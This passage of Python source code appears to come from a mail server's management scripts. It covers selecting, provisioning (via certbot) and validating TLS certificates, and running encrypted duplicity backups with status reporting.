import functools import operator # SELECTING SSL CERTIFICATES FOR USE IN WEB def get_ssl_certificates(env): # Scan all of the installed SSL certificates and map every domain # that the certificates are good for to the best certificate for # the domain. from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey from cryptography.x509 import Certificate # The certificates are all stored here: ssl_root = os.path.join(env["STORAGE_ROOT"], 'ssl') # List all of the files in the SSL directory and one level deep. def get_file_list(): if not os.path.exists(ssl_root): return for fn in os.listdir(ssl_root): if fn == 'ssl_certificate.pem': # This is always a symbolic link # to the certificate to use for # PRIMARY_HOSTNAME. Don't let it # be eligible for use because we # could end up creating a symlink # to itself --- we want to find # the cert that it should be a # symlink to. 
continue fn = os.path.join(ssl_root, fn) if os.path.isfile(fn): yield fn elif os.path.isdir(fn): for fn1 in os.listdir(fn): fn1 = os.path.join(fn, fn1) if os.path.isfile(fn1): yield fn1 # Remember stuff. private_keys = { } certificates = [ ] # Scan each of the files to find private keys and certificates. # We must load all of the private keys first before processing # certificates so that we can check that we have a private key # available before using a certificate. for fn in get_file_list(): try: pem = load_pem(load_cert_chain(fn)[0]) except ValueError: # Not a valid PEM format for a PEM type we care about. continue # Is it a private key? if isinstance(pem, RSAPrivateKey): private_keys[pem.public_key().public_numbers()] = { "filename": fn, "key": pem } # Is it a certificate? if isinstance(pem, Certificate): certificates.append({ "filename": fn, "cert": pem }) # Process the certificates. domains = { } for cert in certificates: # What domains is this certificate good for? cert_domains, primary_domain = get_certificate_domains(cert["cert"]) cert["primary_domain"] = primary_domain # Is there a private key file for this certificate? private_key = private_keys.get(cert["cert"].public_key().public_numbers()) if not private_key: continue cert["private_key"] = private_key # Add this cert to the list of certs usable for the domains. for domain in cert_domains: # The primary hostname can only use a certificate mapped # to the system private key. if domain == env['PRIMARY_HOSTNAME'] and cert["private_key"]["filename"] != os.path.join(env['STORAGE_ROOT'], 'ssl', 'ssl_private_key.pem'): continue domains.setdefault(domain, []).append(cert) # Sort the certificates to prefer good ones. import datetime now = datetime.datetime.utcnow() ret = { } for domain, cert_list in domains.items(): #for c in cert_list: print(domain, c.not_valid_before, c.not_valid_after, "("+str(now)+")", c.issuer, c.subject, c._filename) cert_list.sort(key = lambda cert : ( # must be valid NOW cert["cert"].not_valid_before <= now <= cert["cert"].not_valid_after, # prefer one that is not self-signed cert["cert"].issuer != cert["cert"].subject, ########################################################### # The above lines ensure that valid certificates are chosen # over invalid certificates. The lines below choose between # multiple valid certificates available for this domain. ########################################################### # prefer one with the expiration furthest into the future so # that we can easily rotate to new certs as we get them cert["cert"].not_valid_after, ########################################################### # We always choose the certificate that is good for the # longest period of time. This is important for how we # provision certificates for Let's Encrypt. To ensure that # we don't re-provision every night, we have to ensure that # if we choose to provison a certificate that it will # *actually* be used so the provisioning logic knows it # doesn't still need to provision a certificate for the # domain. ########################################################### # in case a certificate is installed in multiple paths, # prefer the... lexicographically last one? 
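			# (The filename is only a final tie-break. Because reverse=True sorts
			# the key tuple in descending order, True sorts ahead of False and
			# later expiration dates sort first, so index 0 ends up being a
			# currently valid, CA-signed certificate with the longest remaining
			# lifetime.)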
cert["filename"], ), reverse=True) cert = cert_list.pop(0) ret[domain] = { "private-key": cert["private_key"]["filename"], "certificate": cert["filename"], "primary-domain": cert["primary_domain"], "certificate_object": cert["cert"], } return ret def get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=False, use_main_cert=True): if use_main_cert or not allow_missing_cert: # Get the system certificate info. ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_certificate.pem')) system_certificate = { "private-key": ssl_private_key, "certificate": ssl_certificate, "primary-domain": env['PRIMARY_HOSTNAME'], "certificate_object": load_pem(load_cert_chain(ssl_certificate)[0]), } if use_main_cert and domain == env['PRIMARY_HOSTNAME']: # The primary domain must use the server certificate because # it is hard-coded in some service configuration files. return system_certificate wildcard_domain = re.sub(r"^[^\.]+", "*", domain) if domain in ssl_certificates: return ssl_certificates[domain] elif wildcard_domain in ssl_certificates: return ssl_certificates[wildcard_domain] elif not allow_missing_cert: # No valid certificate is available for this domain! Return default files. return system_certificate else: # No valid certificate is available for this domain. return None # PROVISIONING CERTIFICATES FROM LETSENCRYPT def get_certificates_to_provision(env, limit_domains=None, show_valid_certs=True): # Get a set of domain names that we can provision certificates for # using certbot. We start with domains that the box is serving web # for and subtract: # * domains not in limit_domains if limit_domains is not empty # * domains with custom "A" records, i.e. they are hosted elsewhere # * domains with actual "A" records that point elsewhere (misconfiguration) # * domains that already have certificates that will be valid for a while from web_update import get_web_domains from status_checks import query_dns, normalize_ip existing_certs = get_ssl_certificates(env) plausible_web_domains = get_web_domains(env, exclude_dns_elsewhere=False) actual_web_domains = get_web_domains(env) domains_to_provision = set() domains_cant_provision = { } for domain in plausible_web_domains: # Skip domains that the user doesn't want to provision now. if limit_domains and domain not in limit_domains: continue # Check that there isn't an explicit A/AAAA record. if domain not in actual_web_domains: domains_cant_provision[domain] = "The domain has a custom DNS A/AAAA record that points the domain elsewhere, so there is no point to installing a TLS certificate here and we could not automatically provision one anyway because provisioning requires access to the website (which isn't here)." # Check that the DNS resolves to here. else: # Does the domain resolve to this machine in public DNS? If not, # we can't do domain control validation. For IPv6 is configured, # make sure both IPv4 and IPv6 are correct because we don't know # how Let's Encrypt will connect. bad_dns = [] for rtype, value in [("A", env["PUBLIC_IP"]), ("AAAA", env.get("PUBLIC_IPV6"))]: if not value: continue # IPv6 is not configured response = query_dns(domain, rtype) if response != normalize_ip(value): bad_dns.append(f"{response} ({rtype})") if bad_dns: domains_cant_provision[domain] = "The domain name does not resolve to this machine: " \ + (", ".join(bad_dns)) \ + "." else: # DNS is all good. # Check for a good existing cert. 
existing_cert = get_domain_ssl_files(domain, existing_certs, env, use_main_cert=False, allow_missing_cert=True) if existing_cert: existing_cert_check = check_certificate(domain, existing_cert['certificate'], existing_cert['private-key'], warn_if_expiring_soon=14) if existing_cert_check[0] == "OK": if show_valid_certs: domains_cant_provision[domain] = "The domain has a valid certificate already. ({} Certificate: {}, private key {})".format( existing_cert_check[1], existing_cert['certificate'], existing_cert['private-key']) continue domains_to_provision.add(domain) return (domains_to_provision, domains_cant_provision) def provision_certificates(env, limit_domains): # What domains should we provision certificates for? And what # errors prevent provisioning for other domains. domains, domains_cant_provision = get_certificates_to_provision(env, limit_domains=limit_domains) # Build a list of what happened on each domain or domain-set. ret = [] for domain, error in domains_cant_provision.items(): ret.append({ "domains": [domain], "log": [error], "result": "skipped", }) # Break into groups by DNS zone: Group every domain with its parent domain, if # its parent domain is in the list of domains to request a certificate for. # Start with the zones so that if the zone doesn't need a certificate itself, # its children will still be grouped together. Sort the provision domains to # put parents ahead of children. # Since Let's Encrypt requests are limited to 100 domains at a time, # we'll create a list of lists of domains where the inner lists have # at most 100 items. By sorting we also get the DNS zone domain as the first # entry in each list (unless we overflow beyond 100) which ends up as the # primary domain listed in each certificate. from dns_update import get_dns_zones certs = { } for zone, _zonefile in get_dns_zones(env): certs[zone] = [[]] for domain in sort_domains(domains, env): # Does the domain end with any domain we've seen so far. for parent in certs: if domain.endswith("." + parent): # Add this to the parent's list of domains. # Start a new group if the list already has # 100 items. if len(certs[parent][-1]) == 100: certs[parent].append([]) certs[parent][-1].append(domain) break else: # This domain is not a child of any domain we've seen yet, so # start a new group. This shouldn't happen since every zone # was already added. certs[domain] = [[domain]] # Flatten to a list of lists of domains (from a mapping). Remove empty # lists (zones with no domains that need certs). certs = functools.reduce(operator.iadd, certs.values(), []) certs = [_ for _ in certs if len(_) > 0] # Prepare to provision. # Where should we put our Let's Encrypt account info and state cache. account_path = os.path.join(env['STORAGE_ROOT'], 'ssl/lets_encrypt') if not os.path.exists(account_path): os.mkdir(account_path) # Provision certificates. for domain_list in certs: ret.append({ "domains": domain_list, "log": [], }) try: # Create a CSR file for our master private key so that certbot # uses our private key. key_file = os.path.join(env['STORAGE_ROOT'], 'ssl', 'ssl_private_key.pem') with tempfile.NamedTemporaryFile() as csr_file: # We could use openssl, but certbot requires # that the CN domain and SAN domains match # the domain list passed to certbot, and adding # SAN domains openssl req is ridiculously complicated. 
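				# (The commented-out subprocess call below is the abandoned openssl
				# approach, kept for reference; the cryptography-based CSR builder
				# that follows signs the request with the box's master private key
				# so that certbot's --csr mode reuses that key.)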
# subprocess.check_output([ # "openssl", "req", "-new", # "-key", key_file, # "-out", csr_file.name, # "-subj", "/CN=" + domain_list[0], # "-sha256" ]) from cryptography import x509 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.serialization import Encoding from cryptography.hazmat.primitives import hashes from cryptography.x509.oid import NameOID builder = x509.CertificateSigningRequestBuilder() builder = builder.subject_name(x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, domain_list[0]) ])) builder = builder.add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True) builder = builder.add_extension(x509.SubjectAlternativeName( [x509.DNSName(d) for d in domain_list] ), critical=False) request = builder.sign(load_pem(load_cert_chain(key_file)[0]), hashes.SHA256(), default_backend()) with open(csr_file.name, "wb") as f: f.write(request.public_bytes(Encoding.PEM)) # Provision, writing to a temporary file. webroot = os.path.join(account_path, 'webroot') os.makedirs(webroot, exist_ok=True) with tempfile.TemporaryDirectory() as d: cert_file = os.path.join(d, 'cert_and_chain.pem') print("Provisioning TLS certificates for " + ", ".join(domain_list) + ".") certbotret = subprocess.check_output([ "certbot", "certonly", #"-v", # just enough to see ACME errors "--non-interactive", # will fail if user hasn't registered during Mail-in-a-Box setup "-d", ",".join(domain_list), # first will be main domain "--csr", csr_file.name, # use our private key; unfortunately this doesn't work with auto-renew so we need to save cert manually "--cert-path", os.path.join(d, 'cert'), # we only use the full chain "--chain-path", os.path.join(d, 'chain'), # we only use the full chain "--fullchain-path", cert_file, "--webroot", "--webroot-path", webroot, "--config-dir", account_path, #"--staging", ], stderr=subprocess.STDOUT).decode("utf8") install_cert_copy_file(cert_file, env) ret[-1]["log"].append(certbotret) ret[-1]["result"] = "installed" except subprocess.CalledProcessError as e: ret[-1]["log"].append(e.output.decode("utf8")) ret[-1]["result"] = "error" except Exception as e: ret[-1]["log"].append(str(e)) ret[-1]["result"] = "error" # Run post-install steps. ret.extend(post_install_func(env)) # Return what happened with each certificate request. return ret def provision_certificates_cmdline(): import sys from exclusiveprocess import Lock from utils import load_environment Lock(die=True).forever() env = load_environment() quiet = False domains = [] for arg in sys.argv[1:]: if arg == "-q": quiet = True else: domains.append(arg) # Go. status = provision_certificates(env, limit_domains=domains) # Show what happened. for request in status: if isinstance(request, str): print(request) else: if quiet and request['result'] == 'skipped': continue print(request['result'] + ":", ", ".join(request['domains']) + ":") for line in request["log"]: print(line) print() # INSTALLING A NEW CERTIFICATE FROM THE CONTROL PANEL def create_csr(domain, ssl_key, country_code, env): return shell("check_output", [ "openssl", "req", "-new", "-key", ssl_key, "-sha256", "-subj", f"/C={country_code}/CN={domain}"]) def install_cert(domain, ssl_cert, ssl_chain, env, raw=False): # Write the combined cert+chain to a temporary path and validate that it is OK. # The certificate always goes above the chain. import tempfile fd, fn = tempfile.mkstemp('.pem') os.write(fd, (ssl_cert + '\n' + ssl_chain).encode("ascii")) os.close(fd) # Do validation on the certificate before installing it. 
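	# check_certificate() returns a (status, details) tuple; any status other
	# than "OK" (including the special "SELF-SIGNED" flag handled below)
	# aborts the installation and the message is returned to the caller.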
ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) cert_status, cert_status_details = check_certificate(domain, fn, ssl_private_key) if cert_status != "OK": if cert_status == "SELF-SIGNED": cert_status = "This is a self-signed certificate. I can't install that." os.unlink(fn) if cert_status_details is not None: cert_status += " " + cert_status_details return cert_status # Copy certificate into ssl directory. install_cert_copy_file(fn, env) # Run post-install steps. ret = post_install_func(env) if raw: return ret return "\n".join(ret) def install_cert_copy_file(fn, env): # Where to put it? # Make a unique path for the certificate. from cryptography.hazmat.primitives import hashes from binascii import hexlify cert = load_pem(load_cert_chain(fn)[0]) _all_domains, cn = get_certificate_domains(cert) path = "{}-{}-{}.pem".format( safe_domain_name(cn), # common name, which should be filename safe because it is IDNA-encoded, but in case of a malformed cert make sure it's ok to use as a filename cert.not_valid_after.date().isoformat().replace("-", ""), # expiration date hexlify(cert.fingerprint(hashes.SHA256())).decode("ascii")[0:8], # fingerprint prefix ) ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', path)) # Install the certificate. os.makedirs(os.path.dirname(ssl_certificate), exist_ok=True) shutil.move(fn, ssl_certificate) def post_install_func(env): ret = [] # Get the certificate to use for PRIMARY_HOSTNAME. ssl_certificates = get_ssl_certificates(env) cert = get_domain_ssl_files(env['PRIMARY_HOSTNAME'], ssl_certificates, env, use_main_cert=False) if not cert: # Ruh-row, we don't have any certificate usable # for the primary hostname. ret.append("there is no valid certificate for " + env['PRIMARY_HOSTNAME']) # Symlink the best cert for PRIMARY_HOSTNAME to the system # certificate path, which is hard-coded for various purposes, and then # restart postfix and dovecot. system_ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_certificate.pem')) if cert and os.readlink(system_ssl_certificate) != cert['certificate']: # Update symlink. ret.append("updating primary certificate") ssl_certificate = cert['certificate'] os.unlink(system_ssl_certificate) os.symlink(ssl_certificate, system_ssl_certificate) # Restart postfix and dovecot so they pick up the new file. shell('check_call', ["/usr/sbin/service", "postfix", "restart"]) shell('check_call', ["/usr/sbin/service", "dovecot", "restart"]) ret.append("mail services restarted") # The DANE TLSA record will remain valid so long as the private key # hasn't changed. We don't ever change the private key automatically. # If the user does it, they must manually update DNS. # Update the web configuration so nginx picks up the new certificate file. from web_update import do_web_update ret.append( do_web_update(env) ) return ret # VALIDATION OF CERTIFICATES def check_certificate(domain, ssl_certificate, ssl_private_key, warn_if_expiring_soon=10, rounded_time=False, just_check_domain=False): # Check that the ssl_certificate & ssl_private_key files are good # for the provided domain. from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey from cryptography.x509 import Certificate # The ssl_certificate file may contain a chain of certificates. We'll # need to split that up before we can pass anything to openssl or # parse them in Python. Parse it with the cryptography library. 
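	# load_cert_chain() (defined below) returns the PEM blocks in file order,
	# so ssl_cert_chain[0] is expected to be the leaf certificate and any
	# remaining entries its intermediate chain.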
try: ssl_cert_chain = load_cert_chain(ssl_certificate) cert = load_pem(ssl_cert_chain[0]) if not isinstance(cert, Certificate): raise ValueError("This is not a certificate file.") except ValueError as e: return ("There is a problem with the certificate file: %s" % str(e), None) # First check that the domain name is one of the names allowed by # the certificate. if domain is not None: certificate_names, _cert_primary_name = get_certificate_domains(cert) # Check that the domain appears among the acceptable names, or a wildcard # form of the domain name (which is a stricter check than the specs but # should work in normal cases). wildcard_domain = re.sub(r"^[^\.]+", "*", domain) if domain not in certificate_names and wildcard_domain not in certificate_names: return ("The certificate is for the wrong domain name. It is for %s." % ", ".join(sorted(certificate_names)), None) # Second, check that the certificate matches the private key. if ssl_private_key is not None: try: with open(ssl_private_key, 'rb') as f: priv_key = load_pem(f.read()) except ValueError as e: return (f"The private key file {ssl_private_key} is not a private key file: {e!s}", None) if not isinstance(priv_key, RSAPrivateKey): return ("The private key file %s is not a private key file." % ssl_private_key, None) if priv_key.public_key().public_numbers() != cert.public_key().public_numbers(): return ("The certificate does not correspond to the private key at %s." % ssl_private_key, None) # We could also use the openssl command line tool to get the modulus # listed in each file. The output of each command below looks like "Modulus=XXXXX". # $ openssl rsa -inform PEM -noout -modulus -in ssl_private_key # $ openssl x509 -in ssl_certificate -noout -modulus # Third, check if the certificate is self-signed. Return a special flag string. if cert.issuer == cert.subject: return ("SELF-SIGNED", None) # When selecting which certificate to use for non-primary domains, we check if the primary # certificate or a www-parent-domain certificate is good for the domain. There's no need # to run extra checks beyond this point. if just_check_domain: return ("OK", None) # Check that the certificate hasn't expired. The datetimes returned by the # certificate are 'naive' and in UTC. We need to get the current time in UTC. import datetime now = datetime.datetime.utcnow() if not(cert.not_valid_before <= now <= cert.not_valid_after): return (f"The certificate has expired or is not yet valid. It is valid from {cert.not_valid_before} to {cert.not_valid_after}.", None) # Next validate that the certificate is valid. This checks whether the certificate # is self-signed, that the chain of trust makes sense, that it is signed by a CA # that Ubuntu has installed on this machine's list of CAs, and I think that it hasn't # expired. # The certificate chain has to be passed separately and is given via STDIN. # This command returns a non-zero exit status in most cases, so trap errors. retcode, verifyoutput = shell('check_output', [ "openssl", "verify", "-verbose", "-purpose", "sslserver", "-policy_check",] + ([] if len(ssl_cert_chain) == 1 else ["-untrusted", "/proc/self/fd/0"]) + [ssl_certificate], input=b"\n\n".join(ssl_cert_chain[1:]), trap=True) if "self signed" in verifyoutput: # Certificate is self-signed. Probably we detected this above. return ("SELF-SIGNED", None) elif retcode != 0: if "unable to get local issuer certificate" in verifyoutput: return ("The certificate is missing an intermediate chain or the intermediate chain is incorrect or incomplete. 
(%s)" % verifyoutput, None) # There is some unknown problem. Return the `openssl verify` raw output. return ("There is a problem with the certificate.", verifyoutput.strip()) else: # `openssl verify` returned a zero exit status so the cert is currently # good. # But is it expiring soon? cert_expiration_date = cert.not_valid_after ndays = (cert_expiration_date-now).days if not rounded_time or ndays <= 10: # Yikes better renew soon! expiry_info = "The certificate expires in %d days on %s." % (ndays, cert_expiration_date.date().isoformat()) else: # We'll renew it with Lets Encrypt. expiry_info = "The certificate expires on %s." % cert_expiration_date.date().isoformat() if warn_if_expiring_soon and ndays <= warn_if_expiring_soon: # Warn on day 10 to give 4 days for us to automatically renew the # certificate, which occurs on day 14. return ("The certificate is expiring soon: " + expiry_info, None) # Return the special OK code. return ("OK", expiry_info) def load_cert_chain(pemfile): # A certificate .pem file may contain a chain of certificates. # Load the file and split them apart. re_pem = rb"(-+BEGIN (?:.+)-+[\r\n]+(?:[A-Za-z0-9+/=]{1,64}[\r\n]+)+-+END (?:.+)-+[\r\n]+)" with open(pemfile, "rb") as f: pem = f.read() + b"\n" # ensure trailing newline pemblocks = re.findall(re_pem, pem) if len(pemblocks) == 0: msg = "File does not contain valid PEM data." raise ValueError(msg) return pemblocks def load_pem(pem): # Parse a "---BEGIN .... END---" PEM string and return a Python object for it # using classes from the cryptography package. from cryptography.x509 import load_pem_x509_certificate from cryptography.hazmat.primitives import serialization from cryptography.hazmat.backends import default_backend pem_type = re.match(b"-+BEGIN (.*?)-+[\r\n]", pem) if pem_type is None: msg = "File is not a valid PEM-formatted file." raise ValueError(msg) pem_type = pem_type.group(1) if pem_type in {b"RSA PRIVATE KEY", b"PRIVATE KEY"}: return serialization.load_pem_private_key(pem, password=None, backend=default_backend()) if pem_type == b"CERTIFICATE": return load_pem_x509_certificate(pem, default_backend()) raise ValueError("Unsupported PEM object type: " + pem_type.decode("ascii", "replace")) def get_certificate_domains(cert): from cryptography.x509 import DNSName, ExtensionNotFound, OID_COMMON_NAME, OID_SUBJECT_ALTERNATIVE_NAME import idna names = set() cn = None # The domain may be found in the Subject Common Name (CN). This comes back as an IDNA (ASCII) # string, which is the format we store domains in - so good. try: cn = cert.subject.get_attributes_for_oid(OID_COMMON_NAME)[0].value names.add(cn) except IndexError: # No common name? Certificate is probably generated incorrectly. # But we'll let it error-out when it doesn't find the domain. pass # ... or be one of the Subject Alternative Names. The cryptography library handily IDNA-decodes # the names for us. We must encode back to ASCII, but wildcard certificates can't pass through # IDNA encoding/decoding so we must special-case. See https://github.com/pyca/cryptography/pull/2071. def idna_decode_dns_name(dns_name): if dns_name.startswith("*."): return "*." + idna.encode(dns_name[2:]).decode('ascii') else: return idna.encode(dns_name).decode('ascii') try: sans = cert.extensions.get_extension_for_oid(OID_SUBJECT_ALTERNATIVE_NAME).value.get_values_for_type(DNSName) for san in sans: names.add(idna_decode_dns_name(san)) except ExtensionNotFound: pass return names, cn if __name__ == "__main__": # Provision certificates. 
provision_certificates_cmdline() File: management/backup.py #!/usr/local/lib/mailinabox/env/bin/python # This script performs a backup of all user data: # 1) System services are stopped. # 2) STORAGE_ROOT/backup/before-backup is executed if it exists. # 3) An incremental encrypted backup is made using duplicity. # 4) The stopped services are restarted. # 5) STORAGE_ROOT/backup/after-backup is executed if it exists. import os, os.path, re, datetime, sys import dateutil.parser, dateutil.relativedelta, dateutil.tz import rtyaml from exclusiveprocess import Lock from utils import load_environment, shell, wait_for_service def backup_status(env): # If backups are disabled, return no status. config = get_backup_config(env) if config["target"] == "off": return { } # Query duplicity to get a list of all full and incremental # backups available. backups = { } now = datetime.datetime.now(dateutil.tz.tzlocal()) backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') backup_cache_dir = os.path.join(backup_root, 'cache') def reldate(date, ref, clip): if ref < date: return clip rd = dateutil.relativedelta.relativedelta(ref, date) if rd.years > 1: return "%d years, %d months" % (rd.years, rd.months) if rd.years == 1: return "%d year, %d months" % (rd.years, rd.months) if rd.months > 1: return "%d months, %d days" % (rd.months, rd.days) if rd.months == 1: return "%d month, %d days" % (rd.months, rd.days) if rd.days >= 7: return "%d days" % rd.days if rd.days > 1: return "%d days, %d hours" % (rd.days, rd.hours) if rd.days == 1: return "%d day, %d hours" % (rd.days, rd.hours) return "%d hours, %d minutes" % (rd.hours, rd.minutes) # Get duplicity collection status and parse for a list of backups. def parse_line(line): keys = line.strip().split() date = dateutil.parser.parse(keys[1]).astimezone(dateutil.tz.tzlocal()) return { "date": keys[1], "date_str": date.strftime("%Y-%m-%d %X") + " " + now.tzname(), "date_delta": reldate(date, now, "the future?"), "full": keys[0] == "full", "size": 0, # collection-status doesn't give us the size "volumes": int(keys[2]), # number of archive volumes for this backup (not really helpful) } code, collection_status = shell('check_output', [ "/usr/bin/duplicity", "collection-status", "--archive-dir", backup_cache_dir, "--gpg-options", "'--cipher-algo=AES256'", "--log-fd", "1", *get_duplicity_additional_args(env), get_duplicity_target_url(config) ], get_duplicity_env_vars(env), trap=True) if code != 0: # Command failed. This is likely due to an improperly configured remote # destination for the backups or the last backup job terminated unexpectedly. raise Exception("Something is wrong with the backup: " + collection_status) for line in collection_status.split('\n'): if line.startswith((" full", " inc")): backup = parse_line(line) backups[backup["date"]] = backup # Look at the target directly to get the sizes of each of the backups. There is more than one file per backup. # Starting with duplicity in Ubuntu 18.04, "signatures" files have dates in their # filenames that are a few seconds off the backup date and so don't line up # with the list of backups we have. Track unmatched files so we know how much other # space is used for those. 
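	# Hypothetical filenames, to illustrate what the regex below matches:
	#   duplicity-full.20240101T000000Z.vol1.difftar.gpg
	#     -> date group 20240101T000000Z
	#   duplicity-inc.20240101T000000Z.to.20240108T000000Z.vol1.difftar.gpg
	#     -> date group 20240108T000000Z
	# Matched sizes are added to the corresponding backup; everything else is
	# counted as unmatched space below.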
unmatched_file_size = 0 for fn, size in list_target_files(config): m = re.match(r"duplicity-(full|full-signatures|(inc|new-signatures)\.(?P<incbase>\d+T\d+Z)\.to)\.(?P<date>\d+T\d+Z)\.", fn) if not m: continue # not a part of a current backup chain key = m.group("date") if key in backups: backups[key]["size"] += size else: unmatched_file_size += size # Ensure the rows are sorted reverse chronologically. # This is relied on by should_force_full() and the next step. backups = sorted(backups.values(), key = lambda b : b["date"], reverse=True) # Get the average size of incremental backups, the size of the # most recent full backup, and the date of the most recent # backup and the most recent full backup. incremental_count = 0 incremental_size = 0 first_date = None first_full_size = None first_full_date = None for bak in backups: if first_date is None: first_date = dateutil.parser.parse(bak["date"]) if bak["full"]: first_full_size = bak["size"] first_full_date = dateutil.parser.parse(bak["date"]) break incremental_count += 1 incremental_size += bak["size"] # When will the most recent backup be deleted? It won't be deleted if the next # backup is incremental, because the increments rely on all past increments. # So first guess how many more incremental backups will occur until the next # full backup. That full backup frees up this one to be deleted. But, the backup # must also be at least min_age_in_days old too. deleted_in = None if incremental_count > 0 and incremental_size > 0 and first_full_size is not None: # How many days until the next incremental backup? First, the part of # the algorithm based on increment sizes: est_days_to_next_full = (.5 * first_full_size - incremental_size) / (incremental_size/incremental_count) est_time_of_next_full = first_date + datetime.timedelta(days=est_days_to_next_full) # ...And then the part of the algorithm based on full backup age: est_time_of_next_full = min(est_time_of_next_full, first_full_date + datetime.timedelta(days=config["min_age_in_days"]*10+1)) # It still can't be deleted until it's old enough. est_deleted_on = max(est_time_of_next_full, first_date + datetime.timedelta(days=config["min_age_in_days"])) deleted_in = "approx. %d days" % round((est_deleted_on-now).total_seconds()/60/60/24 + .5) # When will a backup be deleted? Set the deleted_in field of each backup. saw_full = False for bak in backups: if deleted_in: # The most recent increment in a chain and all of the previous backups # it relies on are deleted at the same time. bak["deleted_in"] = deleted_in if bak["full"]: # Reset when we get to a full backup. A new chain start *next*. saw_full = True deleted_in = None elif saw_full and not deleted_in: # We're now on backups prior to the most recent full backup. These are # free to be deleted as soon as they are min_age_in_days old. deleted_in = reldate(now, dateutil.parser.parse(bak["date"]) + datetime.timedelta(days=config["min_age_in_days"]), "on next daily backup") bak["deleted_in"] = deleted_in return { "backups": backups, "unmatched_file_size": unmatched_file_size, } def should_force_full(config, env): # Force a full backup when the total size of the increments # since the last full backup is greater than half the size # of that full backup. inc_size = 0 for bak in backup_status(env)["backups"]: if not bak["full"]: # Scan through the incremental backups cumulating # size... inc_size += bak["size"] else: # ...until we reach the most recent full backup. 
# Return if we should to a full backup, which is based # on the size of the increments relative to the full # backup, as well as the age of the full backup. if inc_size > .5*bak["size"]: return True if dateutil.parser.parse(bak["date"]) + datetime.timedelta(days=config["min_age_in_days"]*10+1) < datetime.datetime.now(dateutil.tz.tzlocal()): return True return False else: # If we got here there are no (full) backups, so make one. # (I love for/else blocks. Here it's just to show off.) return True def get_passphrase(env): # Get the encryption passphrase. secret_key.txt is 2048 random # bits base64-encoded and with line breaks every 65 characters. # gpg will only take the first line of text, so sanity check that # that line is long enough to be a reasonable passphrase. It # only needs to be 43 base64-characters to match AES256's key # length of 32 bytes. backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') with open(os.path.join(backup_root, 'secret_key.txt'), encoding="utf-8") as f: passphrase = f.readline().strip() if len(passphrase) < 43: raise Exception("secret_key.txt's first line is too short!") return passphrase def get_duplicity_target_url(config): target = config["target"] if get_target_type(config) == "s3": from urllib.parse import urlsplit, urlunsplit target = list(urlsplit(target)) # Although we store the S3 hostname in the target URL, # duplicity no longer accepts it in the target URL. The hostname in # the target URL must be the bucket name. The hostname is passed # via get_duplicity_additional_args. Move the first part of the # path (the bucket name) into the hostname URL component, and leave # the rest for the path. (The S3 region name is also stored in the # hostname part of the URL, in the username portion, which we also # have to drop here). target[1], target[2] = target[2].lstrip('/').split('/', 1) target = urlunsplit(target) return target def get_duplicity_additional_args(env): config = get_backup_config(env) if get_target_type(config) == 'rsync': # Extract a port number for the ssh transport. Duplicity accepts the # optional port number syntax in the target, but it doesn't appear to act # on it, so we set the ssh port explicitly via the duplicity options. from urllib.parse import urlsplit try: port = urlsplit(config["target"]).port except ValueError: port = 22 if port is None: port = 22 return [ f"--ssh-options='-i /root/.ssh/id_rsa_miab -p {port}'", f"--rsync-options='-e \"/usr/bin/ssh -oStrictHostKeyChecking=no -oBatchMode=yes -p {port} -i /root/.ssh/id_rsa_miab\"'", ] elif get_target_type(config) == 's3': # See note about hostname in get_duplicity_target_url. # The region name, which is required by some non-AWS endpoints, # is saved inside the username portion of the URL. from urllib.parse import urlsplit, urlunsplit target = urlsplit(config["target"]) endpoint_url = urlunsplit(("https", target.hostname, '', '', '')) args = ["--s3-endpoint-url", endpoint_url] if target.username: # region name is stuffed here args += ["--s3-region-name", target.username] return args return [] def get_duplicity_env_vars(env): config = get_backup_config(env) env = { "PASSPHRASE" : get_passphrase(env) } if get_target_type(config) == 's3': env["AWS_ACCESS_KEY_ID"] = config["target_user"] env["AWS_SECRET_ACCESS_KEY"] = config["target_pass"] return env def get_target_type(config): return config["target"].split(":")[0] def perform_backup(full_backup): env = load_environment() # Create an global exclusive lock so that the backup script # cannot be run more than one. 
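	# (Lock comes from the exclusiveprocess package: with die=True the process
	# exits immediately if another instance already holds the lock, and
	# .forever() keeps the lock for the lifetime of this process.)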
Lock(die=True).forever() config = get_backup_config(env) backup_root = os.path.join(env["STORAGE_ROOT"], 'backup') backup_cache_dir = os.path.join(backup_root, 'cache') backup_dir = os.path.join(backup_root, 'encrypted') # Are backups disabled? if config["target"] == "off": return # On the first run, always do a full backup. Incremental # will fail. Otherwise do a full backup when the size of # the increments since the most recent full backup are # large. try: full_backup = full_backup or should_force_full(config, env) except Exception as e: # This was the first call to duplicity, and there might # be an error already. print(e) sys.exit(1) # Stop services. def service_command(service, command, quit=None): # Execute silently, but if there is an error then display the output & exit. code, ret = shell('check_output', ["/usr/sbin/service", service, command], capture_stderr=True, trap=True) if code != 0: print(ret) if quit: sys.exit(code) service_command("php8.0-fpm", "stop", quit=True) service_command("postfix", "stop", quit=True) service_command("dovecot", "stop", quit=True) service_command("postgrey", "stop", quit=True) # Execute a pre-backup script that copies files outside the homedir. # Run as the STORAGE_USER user, not as root. Pass our settings in # environment variables so the script has access to STORAGE_ROOT. pre_script = os.path.join(backup_root, 'before-backup') if os.path.exists(pre_script): shell('check_call', ['su', env['STORAGE_USER'], '-c', pre_script, config["target"]], env=env) # Run a backup of STORAGE_ROOT (but excluding the backups themselves!). # --allow-source-mismatch is needed in case the box's hostname is changed # after the first backup. See #396. try: shell('check_call', [ "/usr/bin/duplicity", "full" if full_backup else "incr", "--verbosity", "warning", "--no-print-statistics", "--archive-dir", backup_cache_dir, "--exclude", backup_root, "--volsize", "250", "--gpg-options", "'--cipher-algo=AES256'", "--allow-source-mismatch", *get_duplicity_additional_args(env), env["STORAGE_ROOT"], get_duplicity_target_url(config), ], get_duplicity_env_vars(env)) 